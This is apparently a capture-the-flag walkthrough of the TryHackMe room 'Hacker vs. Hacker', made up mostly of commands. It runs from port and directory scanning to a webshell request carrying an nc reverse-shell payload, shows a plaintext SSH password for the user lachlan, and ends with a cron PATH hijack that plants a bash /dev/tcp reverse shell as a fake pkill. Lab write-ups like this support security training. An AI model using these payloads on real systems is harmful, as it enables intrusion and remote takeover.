Hacker vs. Hacker
Room Link: https://tryhackme.com/room/hackervshacker
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
ffuf -u http://$VICTIM/cvs/FUZZ.pdf.php -w /usr/share/wfuzz/wordlist/general/common.txt
Kali
nc lvnp 1337Started using Burp while testing out payloads to url-encode payloads more easy.
Burp
GET /cvs/shell.pdf.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.9.104+1337+>/tmp/f HTTP/1.1
Host: 10.10.21.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
x
I got the password for lachlan but it kept kicking me out
Kali
ssh lachlan@$VICTIM
Password: thisistheway123
There is a cronjob running that is killing our shell but can see it is using paths, it first used what is in lachlans bin fodler before /bin and /usr/bin so we can put a reverse shell instead.
Victim(www-data)
cat /etc/cron.d/persistence 
Victim(lachlan)
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x bin/pkillKali
nc -lvnp 1338
Last updated